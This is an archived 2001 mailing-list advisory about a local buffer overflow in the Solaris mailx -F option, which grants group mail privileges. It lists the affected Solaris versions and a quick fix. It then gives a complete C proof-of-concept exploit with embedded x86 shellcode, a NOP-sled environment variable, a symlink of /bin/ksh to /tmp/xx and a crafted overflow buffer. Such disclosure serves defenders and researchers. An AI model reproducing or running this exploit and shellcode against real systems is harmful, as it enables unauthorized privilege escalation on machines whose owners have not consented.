OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: Pablo Sor (psorAFIP.GOV.AR)
Date: Wed May 02 2001 - 11:30:45 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    Vulnerability in Solaris mailx(1)

    Date Published: April 11, 2001

    Advisory ID: N/A

    Bugtraq ID: N/A

    CVE CAN: Non currently assigned.

    Title: Solaris mailx(1) Buffer Overflow Vulnerability

    Class: Boundary Error Condition

    Remotely Exploitable: No

    Locally Exploitable: Yes

    Vulnerability Description:

    The mailx program is installed setgid mail by default in Solaris,
    a buffer overrun exists in the -F option, by specifying a long buffer
    containing machine executable code, it is possible to execute
    arbitrary command as gid mail.

    Vulnerable Packages/Systems:

    Solaris 8 SPARC
    Solaris 8 x86
    Solaris 7 SPARC
    Solaris 7 x86
    Solaris 2.6 SPARC
    Solaris 2.6 x86
    Solaris 2.5.1 SPARC
    Solaris 2.5.1 x86
    Solaris 2.5 SPARC
    Solaris 2.5 x86

    Quick Fix:

    Clear the sgid bit of /usr/bin/mailx program.

    Solution/Vendor :

    Sun Microsystems was notified on April 18, 2001. Patches are excepted shortly.

    Vendor notified on: April 18, 2001

    Credits:

    This vulnerability was discovered by Pablo Sor, Buenos Aires, Argentina.

    This advisory was drafted with the help of the SecurityFocus.com Vulnerability
    Help Team. For more information or assistance drafting advisories please mail
    vulnhelpsecurityfocus.com.

    Technical Description - Exploit/Concept Code:

    #include <fcntl.h>

    /*

       /usr/bin/mailx overflow proof of conecpt.

       Pablo Sor, Buenos Aires, Argentina 04/2001
       psorafip.gov.ar, psorccc.uba.ar

       works against x86 solaris 8

       default offset should work.

       usage:

       bash$ id
       uid=100(laika) gid=1(other)

       bash$ ./mailx-exp
       Subject: tomy
       .
       EOT

       [wait...]

       $ id
       uid=100(laika) gid=1(other) egid=6(mail)

    */

    long get_esp() { __asm__("movl %esp,%eax"); }

    int main(int ac, char **av)
    {

    char shell[]=
    "\xeb\x1c\x5e\x33\xc0\x33\xdb\xb3\x08\xfe\xc3\x2b\xf3\x88\x06"
    "\x6a\x06\x50\xb0\x88\x9a\xff\xff\xff\xff\x07\xee\xeb\x06\x90"
    "\xe8\xdf\xff\xff\xff\x55\x8b\xec\x83\xec\x08\xeb\x5d\x33\xc0"
    "\xb0\x3a\xfe\xc0\xeb\x16\xc3\x33\xc0\x40\xeb\x10\xc3\x5e\x33"
    "\xdb\x89\x5e\x01\xc6\x46\x05\x07\x88\x7e\x06\xeb\x05\xe8\xec"
    "\xff\xff\xff\x9a\xff\xff\xff\xff\x0f\x0f\xc3\x5e\x33\xc0\x89"
    "\x76\x08\x88\x46\x07\x33\xd2\xb2\x06\x02\xd2\x89\x04\x16\x50"
    "\x8d\x46\x08\x50\x8b\x46\x08\x50\xe8\xb5\xff\xff\xff\x33\xd2"
    "\xb2\x06\x02\xd2\x03\xe2\x6a\x01\xe8\xaf\xff\xff\xff\x83\xc4"
    "\x04\xe8\xc9\xff\xff\xff\x2f\x74\x6d\x70\x2f\x78\x78";

     unsigned long magic = get_esp() + 2075; /* default offset */
     unsigned char buf[1150];
     char *envi;

     envi = (char *)malloc(300*sizeof(char));
     memset(envi,0x90,300);
     memcpy(envi+280-strlen(shell),shell,strlen(shell));
     memcpy(envi,"SOR=",4);
     envi[299]=0;
     putenv(envi);

     symlink("/bin/ksh","/tmp/xx");
     memset(buf,0x41,1150);
     memcpy(buf+1116,&magic,4);
     buf[1149]=0;
     execl("/usr/bin/mailx","mailx","-F",buf,NULL);
    }

    --
    Pablo Sor
    psorafip.gov.ar, psorccc.uba.ar